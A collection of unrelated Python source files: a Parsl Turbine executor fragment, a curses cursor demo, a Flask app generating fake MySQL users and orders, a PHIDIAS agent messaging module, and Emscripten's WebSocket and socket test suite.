"exception": serialize_object(e)}
outgoing_q.put(response)
logger.debug("[RUNNER] Terminating")
class TurbineExecutor(ParslExecutor):
"""The Turbine executor.
Bypass the Swift/T language and run on top off the Turbine engines
in an MPI environment.
Here is a diagram
.. code:: python
| Data | Executor | IPC | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|outgoing_q -|-> Worker_Process
| | | | | | |
Parsl<---Fut-| | | | result exception
^ | | | | | |
| | | Q_mngmnt | | V V
| | | Thread<--|incoming_q<-|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
"""
def __init__(self, label='turbine', storage_access=None, working_dir=None, managed=True):
"""Initialize the thread pool.
Trying to implement the emews model.
"""
logger.debug("Initializing TurbineExecutor")
self.label = label
self.storage_access = storage_access
self.working_dir = working_dir
self.managed = managed
def start(self):
self.mp_manager = mp.Manager()
self.outgoing_q = self.mp_manager.Queue()
self.incoming_q = self.mp_manager.Queue()
self.is_alive = True
self._queue_management_thread = None
self._start_queue_management_thread()
logger.debug("Created management thread : %s", self._queue_management_thread)
self.worker = mp.Process(target=runner, args=(self.outgoing_q, self.incoming_q))
self.worker.start()
logger.debug("Created worker : %s", self.worker)
self.tasks = {}
self._scaling_enabled = False
def _queue_management_worker(self):
"""Listen to the queue for task status messages and handle them.
Depending on the message, tasks will be updated with results, exceptions,
or updates. It expects the following messages:
.. code:: python
{
"task_id" : <task_id>
"result" : serialized result object, if task succeeded
... more tags could be added later
}
{
"task_id" : <task_id>
"exception" : serialized exception object, on failure
}
We do not support these yet, but they could be added easily.
.. code:: python
{
"task_id" : <task_id>
"cpu_stat" : <>
"mem_stat" : <>
"io_stat" : <>
"started" : tstamp
}
The `None` message is a die request.
"""
while True:
logger.debug("[MTHREAD] Management thread active")
try:
msg = self.incoming_q.get(block=True, timeout=1)
except queue.Empty:
# Timed out.
pass
except IOError as e:
logger.debug("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e))
return
except Exception as e:
logger.debug("[MTHREAD] Caught unknown exception: {}".format(e))
else:
if msg is None:
logger.debug("[MTHREAD] Got None")
return
else:
logger.debug("[MTHREAD] Received message: {}".format(msg))
task_fut = self.tasks[msg['task_id']]
if 'result' in msg:
result, _ = deserialize_object(msg['result'])
task_fut.set_result(result)
elif 'exception' in msg:
exception, _ = deserialize_object(msg['exception'])
task_fut.set_exception(exception)
if not self.is_alive:
break
# When the executor gets lost, the weakref callback will wake up
# the queue management thread.
def weakref_cb(self, q=None):
"""We do not use this yet."""
q.put(None)
def _start_queue_management_thread(self):
"""Method to start the management thread as a daemon.
Checks if a thread already exists, then starts it.
Could be used later as a restart if the management thread dies.
"""
logging.debug("In _start %s", "*" * 40)
if self._queue_management_thread is None:
logging.debug("Starting management thread ")
self._queue_management_thread = threading.Thread(target=self._queue_management_worker)
self._queue_management_thread.daemon = True
self._queue_management_thread.start()
else:
logging.debug("Management thread already exists, returning")
def shutdown(self):
"""Shutdown method, to kill the threads and workers."""
self.is_alive = False
logging.debug("Waking management thread")
self.incoming_q.put(None) # Wake up the thread
self._queue_management_thread.join() # Force join
logging.debug("Exiting thread")
self.worker.join()
return True
def submit(self, func, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method is simply pass through and behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- *args (list) : List of arbitrary positional arguments.
Kwargs:
- **kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
task_id = uuid.uuid4()
logger.debug("Pushing function {} to queue with args {}".format(func, args))
self.tasks[task_id] = Future()
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024,
item_threshold=1024)
msg = {"task_id": task_id,
"buffer": fn_buf}
# Post task to the the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return self.tasks[task_id]
@property
def scaling_enabled(self):
return self._scaling_enabled
def scale_out(self, blocks=1):
"""Scales out the number of active workers by 1.
This method is not implemented for threads and will raise the error if called.
This would be nice to have, and can be done
Raises:
NotImplementedError
"""
raise NotImplementedError
def scale_in(self, blocks):
"""Scale in the number of active blocks by specified amount.
This method is not implemented for turbine and will raise an error if called.
Raises:
NotImplementedError
"""
raise NotImplementedError
if __name__ == "__main__":
print("Start")
turb_x = TurbineExecutor()
print("Done")
|
main.py
|
#!/usr/bin/python
import curses
import time
import threading
xpos = 0
ypos = 0
def main_loop(screen):
while 1:
screen.clear()
screen.refresh()
screen.addstr(ypos, xpos, "Hello world\n")
screen.refresh()
time.sleep(0.05)
screen = curses.initscr()
curses.noecho()
curses.curs_set(0)
screen.keypad(1)
thread = threading.Thread(target=main_loop, args=(screen,))
thread.daemon = True
thread.start()
# Key handling loop.
while 1:
event = screen.getch()
if event == ord("q"):
break
if event == ord("w"):
ypos = ypos-1
if event == ord("a"):
xpos = xpos-1
if event == ord("s"):
ypos = ypos+1
if event == ord("d"):
xpos = xpos+1
if xpos<0: xpos=0
if ypos<0: ypos=0
maxy,maxx = screen.getmaxyx()
if xpos>maxx-1: xpos=maxx-1
if ypos>maxy-2: ypos=maxy-2
curses.endwin()
|
app.py
|
from random import randint, choice
from faker import Faker
from time import sleep
from flask import Flask
from multiprocessing import Process, Value
import os
import pymysql
from models import User, Order, init_db
import logging
POSSIBLE_ACTIONS = ("insert_user", "update_user", "insert_order", "delete_user", "delete_order")
app = Flask(__name__)
def random_with_N_digits(n):
range_start = 10**(n-1)
range_end = (10**n)-1
return randint(range_start, range_end)
@app.route('/')
def main():
db_name = os.getenv("MYSQL_DB","demo")
db_user = os.getenv("MYSQL_USER", "root")
db_pass = os.getenv("MYSQL_PASS")
cloud_sql_connection_name = os.environ["CLOUD_SQL_CONNECTION_NAME"]
unix_socket = '/cloudsql/{}'.format(cloud_sql_connection_name)
cnx = pymysql.connect(user=db_user, password=db_pass,
unix_socket=unix_socket, db=db_name)
with cnx.cursor() as cursor:
cursor.execute('SELECT NOW() as now;')
result = cursor.fetchall()
current_time = result[0][0]
cnx.close()
return str(current_time)
def execution_loop():
print('Init db')
init_db()
while True:
action = choice(POSSIBLE_ACTIONS)
print('Action: ' + action) # will not print anything
if action == "insert_user":
insert_user()
elif action == "update_user":
update_user()
elif action == "insert_order":
add_order()
elif action == "delete_user" and choice(POSSIBLE_ACTIONS) == "delete_user":
delete_user()
elif action == "delete_order" and choice(POSSIBLE_ACTIONS) == "delete_order":
delete_order()
sleep(0.5)
def random_gender():
return choice(('m','f','n'))
def insert_user():
faker = Faker()
User(
id=str(random_with_N_digits(9)),
name=faker.name(),
address=faker.address(),
gender=random_gender(),
).create()
def update_user():
user = User.random()
if user is not None:
if choice((True, False)):
user.gender = random_gender()
user.save()
def delete_user():
user = User.random()
if user is not None:
user.delete()
def add_order():
order = Order.random()
if order is not None:
Order(
user_id=User.id,
product=choice(("Table", "Chair", "Book", "Laptop", "Keyboard"))
).create()
def delete_order():
order = Order.random()
if order is not None:
order.delete()
if __name__ == '__main__':
p = Process(target=execution_loop)
p.start()
app.run(host='127.0.0.1', port=8080, debug=True)
p.join()
|
Messaging.py
|
#
#
#
#from __future__ import print_function
import json
import sys
import threading
# Depending on the selected protocol, beliefs will be sent using different functions
send_belief_impl = None
### "http" protocol
if sys.implementation.name == "micropython":
def start_message_server_http(engines, _globals, port):
raise NotImplementedError("'http' protocol is not supported on the micropython platform")
else:
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse
from io import BytesIO
import requests
class PhidiasHTTPServer_RequestHandler(BaseHTTPRequestHandler):
engines = None
_globals = None
port = 0
def do_GET(self):
self.send_response(500)
#self.send_header('Content-type','text/html')
#self.end_headers()
#message = "Hello world!"
#self.wfile.write(bytes(message, "utf8"))
return
def do_POST(self):
content_length = int(self.headers['Content-Length'])
body = self.rfile.read(content_length)
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
payload = json.loads(body.decode())
# payload = { 'from' : source,
# 'to': agent_name,
# 'data' : ['belief', [ belief.name(), belief.string_terms() ] ] }
response = process_incoming_request(
PhidiasHTTPServer_RequestHandler.engines,
PhidiasHTTPServer_RequestHandler._globals,
self.client_address[0],
payload)
body = json.dumps(response)
response = BytesIO()
response.write(body.encode())
self.wfile.write(response.getvalue())
def log_message(self, format, *args):
return
def send_belief_http(agent_name, destination, belief, source):
parsed_url = urlparse("//" + destination)
if parsed_url.hostname is None:
raise InvalidDestinationException()
port = parsed_url.port
if port is None:
port = 6565
payload = { 'from' : source,
'net-port': PhidiasHTTPServer_RequestHandler.port,
'to': agent_name,
'data' : ['belief', [ belief.name(), belief.string_terms() ] ] }
json_payload = json.dumps(payload)
#print(json_payload)
new_url = "http://" + parsed_url.hostname + ":" + str(port)
r = requests.post(new_url, data=json_payload)
reply = json.loads(r.text)
if reply['result'] != "ok":
print("Messaging Error: ", reply)
def server_thread_http(port):
server_address = ('', port)
PhidiasHTTPServer_RequestHandler.port = port
httpd = HTTPServer(server_address, PhidiasHTTPServer_RequestHandler)
print("")
print("\tPHIDIAS Messaging Server is running at port ", port)
print("")
print("")
#print(httpd.socket)
httpd.serve_forever()
server_thread()
def start_message_server_http(engines, _globals, port = 6565):
global send_belief_impl
send_belief_impl = send_belief_http
PhidiasHTTPServer_RequestHandler.engines = engines
PhidiasHTTPServer_RequestHandler._globals = _globals
t = threading.Thread(target = server_thread_http, args = (port, ))
t.daemon = True
t.start()
return t
### "gateway" protocol
class GatewayConnectionSentRequest: # Future-like object
def __init__(self):
self._result = None
self._cond = threading.Condition()
def set_result(self, result):
with self._cond:
self._result = result
self._cond.notify_all()
def result(self):
with self._cond:
while self._result is None:
self._cond.wait()
return self._result
class GatewayConnectionHandler:
def __init__(self, engines, _globals, sock):
self.engines = engines
self._globals = _globals
self.sock = sock
self.lock = threading.Lock()
self.sent_requests_queue = []
def send_belief(self, agent_name, destination, belief, source):
colon_pos = destination.find(":")
if colon_pos < 0:
to_address = destination
to_port = 6565
else:
to_address = destination[:colon_pos]
to_port = int(destination[colon_pos + 1:])
# Prepare payload
payload = { 'from' : source,
'to': agent_name,
'data' : ['belief', [ belief.name(), belief.string_terms() ] ],
'to-address': to_address,
'to-port': to_port }
json_payload = json.dumps(payload).encode('ascii') + b'\n'
#print('PAYLOAD:', payload)
# Send request
req = GatewayConnectionSentRequest()
with self.lock:
self.sent_requests_queue.append(req)
self.sock.sendall(json_payload)
# Wait for result
reply = req.result()
if reply['result'] != "ok":
print("Messaging Error: ", reply)
def server_thread(self):
incoming_buffer = b''
while True:
new_data = self.sock.recv(64)
if len(new_data) == 0:
raise RuntimeError('Lost connection to gateway')
incoming_buffer += new_data
while True:
nl_pos = incoming_buffer.find(b"\n")
if nl_pos < 0:
break # no full message yet, keep on waiting
response_payload = json.loads(incoming_buffer[:nl_pos])
incoming_buffer = incoming_buffer[nl_pos + 1:]
# Process the message
with self.lock:
if 'result' in response_payload: # response to our past request
self.sent_requests_queue.pop(0).set_result(response_payload)
else: # incoming request
from_address = response_payload.pop('from-address')
response = process_incoming_request(self.engines, self._globals, from_address, response_payload)
json_response = json.dumps(response).encode('ascii') + b'\n'
self.sock.sendall(json_response)
def start_message_server_gateway(engines, _globals, gateway_sock):
global send_belief_impl
h = GatewayConnectionHandler(engines, _globals, gateway_sock)
send_belief_impl = h.send_belief
t = threading.Thread(target = h.server_thread)
t.daemon = True
t.start()
return t
### protocol-independent
def process_incoming_request(engines, _globals, from_address, payload):
response = { 'result' : 'err',
'reason' : 'Malformed HTTP payload',
'data' : payload }
if 'from' in payload.keys():
if 'net-port' in payload.keys():
if 'to' in payload.keys():
if 'data' in payload.keys():
# format is valid
_from = payload['from']
_to = payload['to']
_data = payload['data']
_net_port = payload['net-port']
if _net_port == 0:
_from = _from + "@<unknown>"
else:
_from = _from + "@" + from_address + ":" + repr(_net_port)
if _to in engines.keys():
if _data[0] == 'belief':
[ Name, Terms ] = _data[1]
k = _globals[Name]
b = k()
b.make_terms(Terms)
b.source_agent = _from
e = engines[_to]
e.add_belief(b)
response = { 'result' : 'ok' }
else:
response = { 'result' : 'err',
'reason' : 'Invalid verb',
'data' : _data }
else:
response = { 'result' : 'err',
'reason' : 'Destination agent not found',
'data' : _to }
return response
class Messaging:
@classmethod
def local_or_remote(cls, agent_name):
at_pos = agent_name.find("@")
if at_pos < 0:
return (False, None, None)
else:
agent_local_name = agent_name[:at_pos]
site_name = agent_name[at_pos + 1:]
return (True, agent_local_name, site_name)
@classmethod
def send_belief(cls, agent_name, destination, belief, source):
send_belief_impl(agent_name, destination, belief, source)
|
test_sockets.py
|
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import multiprocessing
import os
import socket
import shutil
import sys
import time
import unittest
from subprocess import Popen, PIPE
if __name__ == '__main__':
raise Exception('do not run this file directly; do something like: tests/runner.py sockets')
try:
import websockify
except Exception:
# websockify won't successfully import on Windows under Python3, because socketserver.py doesn't export ForkingMixIn.
# (On python2, ForkingMixIn was exported but it didn't actually work on Windows).
# Swallowing the error here means that this file can always be imported, but won't work if actually used on Windows,
# which is the same behavior as before.
pass
import clang_native
from runner import BrowserCore, no_windows, chdir
from tools import shared
from tools.shared import PYTHON, EMCC, NODE_JS, path_from_root, WINDOWS, run_process, JS_ENGINES, CLANG_CC
npm_checked = False
NPM = os.path.join(os.path.dirname(NODE_JS[0]), 'npm.cmd' if WINDOWS else 'npm')
def clean_processes(processes):
for p in processes:
if (not hasattr(p, 'exitcode') or p.exitcode is None) and (not hasattr(p, 'returncode') or p.returncode is None):
# ask nicely (to try and catch the children)
try:
p.terminate() # SIGTERM
except OSError:
pass
time.sleep(1)
# send a forcible kill immediately afterwards. If the process did not die before, this should clean it.
try:
p.terminate() # SIGKILL
except OSError:
pass
class WebsockifyServerHarness():
def __init__(self, filename, args, listen_port, do_server_check=True):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.target_port = listen_port - 1
self.args = args or []
self.do_server_check = do_server_check
def __enter__(self):
# compile the server
# NOTE empty filename support is a hack to support
# the current test_enet
if self.filename:
proc = run_process([CLANG_CC, path_from_root('tests', self.filename), '-o', 'server', '-DSOCKK=%d' % self.target_port] + clang_native.get_clang_native_args() + self.args, clang_native.get_clang_native_env(), stdout=PIPE, stderr=PIPE)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen([os.path.abspath('server')])
self.processes.append(process)
# start the websocket proxy
print('running websockify on %d, forward to tcp %d' % (self.listen_port, self.target_port), file=sys.stderr)
wsp = websockify.WebSocketProxy(verbose=True, listen_port=self.listen_port, target_host="127.0.0.1", target_port=self.target_port, run_once=True)
self.websockify = multiprocessing.Process(target=wsp.start_server)
self.websockify.start()
self.processes.append(self.websockify)
# Make sure both the actual server and the websocket proxy are running
for i in range(10):
try:
if self.do_server_check:
server_sock = socket.create_connection(('localhost', self.target_port), timeout=1)
server_sock.close()
proxy_sock = socket.create_connection(('localhost', self.listen_port), timeout=1)
proxy_sock.close()
break
except IOError:
time.sleep(1)
else:
clean_processes(self.processes)
raise Exception('[Websockify failed to start up in a timely manner]')
print('[Websockify on process %s]' % str(self.processes[-2:]))
def __exit__(self, *args, **kwargs):
# try to kill the websockify proxy gracefully
if self.websockify.is_alive():
self.websockify.terminate()
self.websockify.join()
# clean up any processes we started
clean_processes(self.processes)
class CompiledServerHarness():
def __init__(self, filename, args, listen_port):
self.processes = []
self.filename = filename
self.listen_port = listen_port
self.args = args or []
def __enter__(self):
# assuming this is only used for WebSocket tests at the moment, validate that
# the ws module is installed
global npm_checked
if not npm_checked:
child = run_process(NODE_JS + ['-e', 'require("ws");'], check=False)
assert child.returncode == 0, '"ws" node module not found. you may need to run npm install'
npm_checked = True
# compile the server
proc = run_process([EMCC, '-Werror', path_from_root('tests', self.filename), '-o', 'server.js', '-DSOCKK=%d' % self.listen_port] + self.args)
print('Socket server build: out:', proc.stdout or '', '/ err:', proc.stderr or '')
process = Popen(NODE_JS + ['server.js'])
self.processes.append(process)
def __exit__(self, *args, **kwargs):
# clean up any processes we started
clean_processes(self.processes)
# always run these tests last
# make sure to use different ports in each one because it takes a while for the processes to be cleaned up
# Executes a native executable server process
class BackgroundServerProcess():
def __init__(self, args):
self.processes = []
self.args = args
def __enter__(self):
print('Running background server: ' + str(self.args))
process = Popen(self.args)
self.processes.append(process)
def __exit__(self, *args, **kwargs):
clean_processes(self.processes)
def NodeJsWebSocketEchoServerProcess():
return BackgroundServerProcess(NODE_JS + [path_from_root('tests', 'websocket', 'nodejs_websocket_echo_server.js')])
def PythonTcpEchoServerProcess(port):
return BackgroundServerProcess([PYTHON, path_from_root('tests', 'websocket', 'tcp_echo_server.py'), port])
class sockets(BrowserCore):
emcc_args = []
@classmethod
def setUpClass(cls):
super(sockets, cls).setUpClass()
print()
print('Running the socket tests. Make sure the browser allows popups from localhost.')
print()
# Use emscripten root for node module lookup. This is needed because the unit tests each
# run with CWD set to a temporary directory outside the emscripten tree.
print('Setting NODE_PATH=' + path_from_root('node_modules'))
os.environ['NODE_PATH'] = path_from_root('node_modules')
def test_sockets_echo(self, extra_args=[]):
sockets_include = '-I' + path_from_root('tests', 'sockets')
# Note: in the WebsockifyServerHarness and CompiledServerHarness tests below, explicitly use consecutive server listen ports,
# because server teardown might not occur deterministically (python dtor time) and is a bit racy.
# WebsockifyServerHarness uses two port numbers, x and x-1, so increment it by two.
# CompiledServerHarness only uses one. Start with 49160 & 49159 as the first server port addresses. If adding new tests,
# increment the used port addresses below.
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49161), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49162), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1'], 49163), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49160), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, sockets_include])
def test_sockets_echo_pthreads(self, extra_args=[]):
self.test_sockets_echo(['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_sdl2_sockets_echo(self):
harness = CompiledServerHarness('sdl2_net_server.c', ['-s', 'USE_SDL=2', '-s', 'USE_SDL_NET=2'], 49164)
with harness:
self.btest('sdl2_net_client.c', expected='0', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_NET=2', '-DSOCKK=%d' % harness.listen_port])
def test_sockets_async_echo(self):
# Run with ./runner.py sockets.test_sockets_async_echo
sockets_include = '-I' + path_from_root('tests', 'sockets')
# Websockify-proxied servers can't run dgram tests
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ASYNC=1'], 49167), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1', '-DTEST_ASYNC=1'], 49168), 1),
# The following forces non-NULL addr and addlen parameters for the accept call
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0', '-DTEST_ACCEPT_ADDR=1', '-DTEST_ASYNC=1'], 49169), 0)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_ASYNC=1'], 49166), 0)]
for harness, datagram in harnesses:
print('harness:', harness)
with harness:
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram, '-DTEST_ASYNC=1', sockets_include])
# Deliberately attempt a connection on a port that will fail to test the error callback and getsockopt
print('expect fail')
self.btest(os.path.join('sockets', 'test_sockets_echo_client.c'), expected='0', args=['-DSOCKK=49169', '-DTEST_ASYNC=1', sockets_include])
def test_sockets_echo_bigdata(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
# generate a large string literal to use as our message
message = ''
for i in range(256 * 256 * 2):
message += str(chr(ord('a') + (i % 26)))
# re-write the client test with this literal (it's too big to pass via command line)
input_filename = path_from_root('tests', 'sockets', 'test_sockets_echo_client.c')
input = open(input_filename).read()
output = input.replace('#define MESSAGE "pingtothepong"', '#define MESSAGE "%s"' % message)
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 49172), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 49173), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 49171), 0)]
for harness, datagram in harnesses:
with harness:
self.btest(output, expected='0', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], force_c=True)
@no_windows('This test is Unix-specific.')
@unittest.skip('fails on python3 - ws library may need to be updated')
def test_sockets_partial(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49180),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_partial_server.c'), [], 49181)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_partial_client.c'), expected='165', args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_down(self):
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49190, do_server_check=False),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_select_server_down_server.c'), [], 49191)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_down_client.c'), expected='266', args=['-DSOCKK=%d' % harness.listen_port])
@no_windows('This test is Unix-specific.')
def test_sockets_select_server_closes_connection_rw(self):
sockets_include = '-I' + path_from_root('tests', 'sockets')
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49200),
CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DCLOSE_CLIENT_AFTER_ECHO'], 49201)
]:
with harness:
self.btest(os.path.join('sockets', 'test_sockets_select_server_closes_connection_client_rw.c'), expected='266', args=[sockets_include, '-DSOCKK=%d' % harness.listen_port])
@no_windows('This test uses Unix-specific build architecture.')
def test_enet(self):
# this is also a good test of raw usage of emconfigure and emmake
shared.try_delete('enet')
shutil.copytree(path_from_root('tests', 'third_party', 'enet'), 'enet')
with chdir('enet'):
self.run_process([path_from_root('emconfigure'), './configure'])
self.run_process([path_from_root('emmake'), 'make'])
enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + self.in_dir('enet', 'include')]
for harness in [
CompiledServerHarness(os.path.join('sockets', 'test_enet_server.c'), enet, 49210)
]:
with harness:
self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=enet + ['-DSOCKK=%d' % harness.listen_port])
# This test is no longer in use for WebSockets as we can't truly emulate
# a server in the browser (in the past, there were some hacks to make it
# somewhat work, but those have been removed). However, with WebRTC it
# should be able to resurect this test.
# def test_enet_in_browser(self):
# shared.try_delete('enet')
# shutil.copytree(path_from_root('tests', 'enet'), 'enet')
# pwd = os.getcwd()
# os.chdir('enet')
# self.run_process([path_from_root('emconfigure'), './configure'])
# self.run_process([path_from_root('emmake'), 'make'])
# enet = [self.in_dir('enet', '.libs', 'libenet.a'), '-I' + path_from_root('tests', 'enet', 'include')]
# os.chdir(pwd)
# self.run_process([EMCC, path_from_root('tests', 'sockets', 'test_enet_server.c'), '-o', 'server.html', '-DSOCKK=2235'] + enet)
# def make_relay_server(port1, port2):
# print('creating relay server on ports %d,%d' % (port1, port2), file=sys.stderr)
# proc = self.run_process([PYTHON, path_from_root('tests', 'sockets', 'socket_relay.py'), str(port1), str(port2)])
# return proc
# with WebsockifyServerHarness('', [], 2235, 2234):
# with WebsockifyServerHarness('', [], 2237, 2236):
# pids = []
# try:
# proc = make_relay_server(2234, 2236)
# pids.append(proc.pid)
# self.btest(os.path.join('sockets', 'test_enet_client.c'), expected='0', args=['-DSOCKK=2237', '-DUSE_IFRAME=1'] + enet)
# finally:
# clean_pids(pids);
def test_webrtc(self): # XXX see src/settings.js, this is disabled pending investigation
self.skipTest('WebRTC support is not up to date.')
host_src = 'webrtc_host.c'
peer_src = 'webrtc_peer.c'
host_outfile = 'host.html'
peer_outfile = 'peer.html'
host_filepath = path_from_root('tests', 'sockets', host_src)
temp_host_filepath = os.path.join(self.get_dir(), os.path.basename(host_src))
with open(host_filepath) as f:
host_src = f.read()
with open(temp_host_filepath, 'w') as f:
f.write(self.with_report_result(host_src))
peer_filepath = path_from_root('tests', 'sockets', peer_src)
temp_peer_filepath = os.path.join(self.get_dir(), os.path.basename(peer_src))
with open(peer_filepath) as f:
peer_src = f.read()
with open(temp_peer_filepath, 'w') as f:
f.write(self.with_report_result(peer_src))
open(os.path.join(self.get_dir(), 'host_pre.js'), 'w').write('''
var Module = {
webrtc: {
broker: 'http://localhost:8182',
session: undefined,
onpeer: function(peer, route) {
window.open('http://localhost:8888/peer.html?' + route);
// iframe = document.createElement("IFRAME");
// iframe.setAttribute("src", "http://localhost:8888/peer.html?" + route);
// iframe.style.display = "none";
// document.body.appendChild(iframe);
peer.listen();
},
onconnect: function(peer) {
},
ondisconnect: function(peer) {
},
onerror: function(error) {
console.error(error);
}
},
setStatus: function(text) {
console.log('status: ' + text);
}
};
''')
open(os.path.join(self.get_dir(), 'peer_pre.js'), 'w').write('''
var Module = {
webrtc: {
broker: 'http://localhost:8182',
session: window.location.toString().split('?')[1],
onpeer: function(peer, route) {
peer.connect(Module['webrtc']['session']);
},
onconnect: function(peer) {
},
ondisconnect: function(peer) {
// Calling window.close() from this handler hangs my browser, so run it in the next turn
setTimeout(window.close, 0);
},
onerror: function(error) {
console.error(error);
},
},
setStatus: function(text) {
console.log('status: ' + text);
}
};
''')
self.run_process([EMCC, '-Werror', temp_host_filepath, '-o', host_outfile] + ['-s', 'GL_TESTING=1', '--pre-js', 'host_pre.js', '-s', 'SOCKET_WEBRTC=1', '-s', 'SOCKET_DEBUG=1'])
self.run_process([EMCC, '-Werror', temp_peer_filepath, '-o', peer_outfile] + ['-s', 'GL_TESTING=1', '--pre-js', 'peer_pre.js', '-s', 'SOCKET_WEBRTC=1', '-s', 'SOCKET_DEBUG=1'])
# note: you may need to run this manually yourself, if npm is not in the path, or if you need a version that is not in the path
self.run_process([NPM, 'install', path_from_root('tests', 'sockets', 'p2p')])
broker = Popen(NODE_JS + [path_from_root('tests', 'sockets', 'p2p', 'broker', 'p2p-broker.js')])
expected = '1'
self.run_browser(host_outfile, '.', ['/report_result?' + e for e in expected])
broker.kill()
def test_nodejs_sockets_echo(self):
# This test checks that sockets work when the client code is run in Node.js
# Run with ./runner.py sockets.test_nodejs_sockets_echo
if NODE_JS not in JS_ENGINES:
self.skipTest('node is not present')
sockets_include = '-I' + path_from_root('tests', 'sockets')
harnesses = [
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=0'], 59162), 0),
(CompiledServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include, '-DTEST_DGRAM=1'], 59164), 1)
]
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
harnesses += [(WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59160), 0)]
# Basic test of node client against both a Websockified and compiled echo server.
for harness, datagram in harnesses:
with harness:
self.run_process([EMCC, '-Werror', path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-DSOCKK=%d' % harness.listen_port, '-DTEST_DGRAM=%d' % datagram], stdout=PIPE, stderr=PIPE)
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
if not WINDOWS: # TODO: Python pickling bug causes WebsockifyServerHarness to not work on Windows.
# Test against a Websockified server with compile time configured WebSocket subprotocol. We use a Websockified
# server because as long as the subprotocol list contains binary it will configure itself to accept binary
# This test also checks that the connect url contains the correct subprotocols.
print("\nTesting compile time WebSocket configuration.\n")
for harness in [
WebsockifyServerHarness(os.path.join('sockets', 'test_sockets_echo_server.c'), [sockets_include], 59166)
]:
with harness:
self.run_process([EMCC, '-Werror', path_from_root('tests', 'sockets', 'test_sockets_echo_client.c'), '-o', 'client.js', '-s', 'SOCKET_DEBUG=1', '-s', 'WEBSOCKET_SUBPROTOCOL="base64, binary"', '-DSOCKK=59166'], stdout=PIPE, stderr=PIPE)
out = self.run_js('client.js')
self.assertContained('do_msg_read: read 14 bytes', out)
self.assertContained(['connect: ws://127.0.0.1:59166, base64,binary', 'connect: ws://127.0.0.1:59166/, base64,binary'], out)
